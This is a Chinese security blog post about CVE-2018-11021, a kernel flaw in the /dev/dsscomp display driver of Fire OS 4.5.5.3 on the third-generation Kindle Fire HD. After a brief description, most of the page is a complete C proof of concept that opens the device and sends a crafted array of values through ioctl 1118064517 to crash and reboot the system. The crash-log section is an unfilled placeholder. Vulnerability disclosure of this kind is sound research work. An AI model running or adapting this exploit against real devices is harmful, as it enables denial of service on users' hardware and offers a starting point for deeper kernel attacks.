(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

admin 2022年1月6日00:42:45安全博客评论13 views3542字阅读11分48秒阅读模式

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/video/omap2/dsscomp/device.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ dsscomp与命令1118064517并导致内核崩溃。

要探索此漏洞,必须打开设备文件/ dev / dsscomp,并使用命令1118064517和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
* Related buggy struct name is dsscomp_setup_dispc_data.
* This Poc should run with permission to do ioctl on /dev/dsscomp.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517;

int main(int argc, char **argv, char **env) {
unsigned int payload[] = {
0xffffffff,
0x00000003,
0x5d200040,
0x79900008,
0x8f5928bd,
0x78b02422,
0x00000000,
0xffffffff,
0xf4c50400,
0x007fffff,
0x8499f562,
0xffff0400,
0x001b131d,
0x60818210,
0x00000007,
0xffffffff,
0x00000000,
0x9da9041c,
0xcd980400,
0x001f03f4,
0x00000007,
0x2a34003f,
0x7c80d8f3,
0x63102627,
0xc73643a8,
0xa28f0665,
0x00000000,
0x689e57b4,
0x01ff0008,
0x5e7324b1,
0xae3b003f,
0x0b174d86,
0x00000400,
0x21ffff37,
0xceb367a4,
0x00000040,
0x00000001,
0xec000f9e,
0x00000001,
0x000001ff,
0x00000000,
0x00000000,
0x0000000f,
0x0425c069,
0x038cc3be,
0x0000000f,
0x00000080,
0xe5790100,
0x5b1bffff,
0x0000d355,
0x0000c685,
0xa0070000,
0x0010ffff,
0x00a0ff00,
0x00000001,
0xff490700,
0x0832ad03,
0x00000006,
0x00000002,
0x00000001,
0x81f871c0,
0x738019cb,
0xbf47ffff,
0x00000040,
0x00000001,
0x7f190f33,
0x00000001,
0x8295769b,
0x0000003f,
0x869f2295,
0xffffffff,
0xd673914f,
0x05055800,
0xed69b7d5,
0x00000000,
0x0107ebbd,
0xd214af8d,
0xffff4a93,
0x26450008,
0x58df0000,
0xd16db084,
0x03ff30dd,
0x00000001,
0x209aff3b,
0xe7850800,
0x00000002,
0x30da815c,
0x426f5105,
0x0de109d7,
0x2c1a65fc,
0xfcb3d75f,
0x00000000,
0x00000001,
0x8066be5b,
0x00000002,
0xffffffff,
0x5cf232ec,
0x680d1469,
0x00000001,
0x00000020,
0xffffffff,
0x00000400,
0xd1d12be8,
0x02010200,
0x01ffc16f,
0xf6e237e6,
0x007f0000,
0x01ff08f8,
0x000f00f9,
0xbad07695,
0x00000000,
0xbaff0000,
0x24040040,
0x00000006,
0x00000004,
0x00000000,
0xbc2e9242,
0x009f5f08,
0x00800000,
0x00000000,
0x00000001,
0xff8800ff,
0x00000001,
0x00000000,
0x000003f4,
0x6faa8472,
0x00000400,
0xec857dd5,
0x00000000,
0x00000040,
0xffffffff,
0x3f004874,
0x0000b77a,
0xec9acb95,
0xfacc0001,
0xffff0001,
0x0080ffff,
0x3600ff03,
0x00000001,
0x8fff7d7f,
0x6b87075a,
0x00000000,
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x001001ff,
0x00000000,
0x00000001,
0xff1f0512,
0x00000001,
0x51e32167,
0xc18c55cc,
0x00000000,
0xffffffff,
0xb4aaf12b,
0x86edfdbd,
0x00000010,
0x0000003f,
0xabff7b00,
0xffff9ea3,
0xb28e0040,
0x000fffff,
0x458603f4,
0xffff007f,
0xa9030f02,
0x00000001,
0x002cffff,
0x9e00cdff,
0x00000004,
0x41414141,
0x41414141,
0x41414141,
0x41414141 };

int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}

崩溃日志

To be added here.

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日00:42:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  (CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞 http://cn-sec.com/archives/720861.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: